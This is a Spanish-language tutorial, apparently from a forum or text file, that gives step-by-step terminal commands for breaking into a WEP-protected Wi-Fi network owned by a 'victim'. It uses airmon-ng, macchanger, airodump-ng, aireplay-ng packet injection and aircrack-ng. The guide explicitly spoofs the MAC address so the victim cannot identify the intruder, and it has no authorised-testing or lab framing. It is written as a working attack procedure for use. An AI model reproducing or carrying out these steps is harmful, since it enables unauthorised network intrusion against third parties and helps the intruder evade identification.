1.

- Primero abrimos un terminal y escribimos el comando "sudo su" para ser super
usuario.

2.- Despues necesitamos saber el nombre de nuestra tarjeta de red; para eso escr
ibimos el comando "iwconfig" (en mi caso es wlan0).

3.- Buscamos la direccion mac de nuestra tarjeta de red; para ello escribimos el
comando "ifconfig" y buscamos en la seccion wlan0.
ahi copiamos nuestra direccion mac y la pegamos en un archivo de texto para usar
la mas adelante. El formato de la direccion mac de
la tarjeta es el siguiente xx:xx:xx:xx:xx:xx.

4.- Enseguida escribimos airmon-ng start "nombre de nuestra tarjeta". En mi caso

seria airmon-ng start wlan0.

5.- Ahora cambiaremos nuestra direccion MAC para que no pueda ser identificada p
or nuestra victima: Para ello escribimos en la terminal:
ifconfig mon0 down, y damos enter, despues escribimos: macchanger -m 00:11:22:33
:44:55 mon0 y damos enter y por ultimo escribimos:
ifconfig mon0 up y damos enter.
6.- Ahora escribimos airodump-ng mon0 y damos enter.

7.- Nos aparacen las redes que estan a nuestro alcance, es importante que haya c
lientes conectados a la red para que sea mas facil el
hackeo y tambien es importante que la red a hackear tenga clave de cifrado WEP.

8.- Ahora que sabemos cual red vamos a hackear debemos copiar en un archivo de t
exto el nombre de la red (ESSID) y su direccion
mac (BSSID), una vez copiados damos control+c sobre el terminal para terminar el
proceso actual.

9.- Enseguida escribimos airodump-ng -c "canal de la red" -w "nombre de archivo

de captura" --bssid "mac de la victima" mon0. En mi caso seria asi
airodump-ng -c 6 -w captura --bssid XX:XX:XX:XX:XX:XX mon0. Con esto se establec
e la conexion al canal 6 el cual es el canal de la red que vamos a hackear.

10.- Abrimos otra terminal y escribimos "sudo su", despues escribimos aireplay-n
g -1 6000 -q 10 -o 1 -e "la ESSID de la victima" -a
"la mac de nuestra victima" -h "la mac de nuestra tarjeta" mon0. Con esto nos au
tentificamos en el canal 6 con nuestra tarjeta
de red y empezamos a obtener datos.

11.- Para hacer mas rapido el proceso abrimos otra terminal, escribimos "sudo su
" y escribimos aireplay-ng -2 -p 6841 -c FF:FF:FF:FF:FF:FF
-b "la mac de nuestra victima" -h "la mac de nuestra tarjeta" mon0. Con esto emp
ieza el ataque y esperamos a que los Datos lleguen
por lo menos a 20000.

12.- Despues de que tengamos mas de 20000 datos abrimos otra terminal, escribimo
s "sudo su" y enseguida escribimos
aircrack-ng "nombre del archivo de captura"-01.cap.Por ejemplo: aircrack-ng clav
e-01.cap

13.- Escribimos control+c en todas las terminales para parar los procesos. copia
mpos la clave wep en un archivo de texto y quitamos
los puntos.

14.- Por ultimo en una terminal escribimos airmon-ng stop wlan0 y enseguida airm
on-ng stop mon0 para dejar nuestra tarjeta de red
en su modo normal.